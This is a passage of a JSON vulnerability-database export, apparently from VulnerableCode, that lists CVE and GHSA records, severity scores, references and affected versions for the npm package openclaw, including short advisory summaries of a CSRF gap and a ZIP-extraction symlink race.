,{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-32974","GHSA-g353-mgv3-8pcj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ewa7-qswv-tqet"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89584?format=json","vulnerability_id":"VCID-fekn-d6f3-xfa6","summary":"OpenClaw: HTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n## Summary\nHTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: This is a real trusted-proxy HTTP CSRF or browser-origin gap in released tags, but it is not critical because it depends on identity-bearing trusted-proxy browser deployments rather than the shared-secret HTTP operator model.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d` — 2026-03-31T19:49:26+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41347","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.047","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04712","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04728","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41347"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"}],"url":"https://github.com/openclaw/openclaw/commit/6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mhr7-2xmv-4c4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41347","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41347"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:35:10Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-cross-site-request-forgery-via-missing-browser-origin-validation-in-http-operator-endpoints"},{"reference_url":"https://github.com/advisories/GHSA-mhr7-2xmv-4c4q","reference_id":"GHSA-mhr7-2xmv-4c4q","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mhr7-2xmv-4c4q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41347","GHSA-mhr7-2xmv-4c4q"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fekn-d6f3-xfa6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50639?format=json","vulnerability_id":"VCID-fjfw-xwxw-u3at","summary":"OpenClaw: ZIP extraction race could write outside destination via parent symlink rebind\nZIP extraction in OpenClaw could be raced into writing outside the intended destination directory via parent-directory symlink rebind between validation and write.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7dac9b05dd9d38dd3929637f26fa356fd8bdd107","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7dac9b05dd9d38dd3929637f26fa356fd8bdd107"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28483","reference_id":"CVE-2026-28483","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28483"},{"reference_url":"https://github.com/advisories/GHSA-r54r-wmmq-mh84","reference_id":"GHSA-r54r-wmmq-mh84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r54r-wmmq-mh84"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r54r-wmmq-mh84","reference_id":"GHSA-r54r-wmmq-mh84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r54r-wmmq-mh84"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-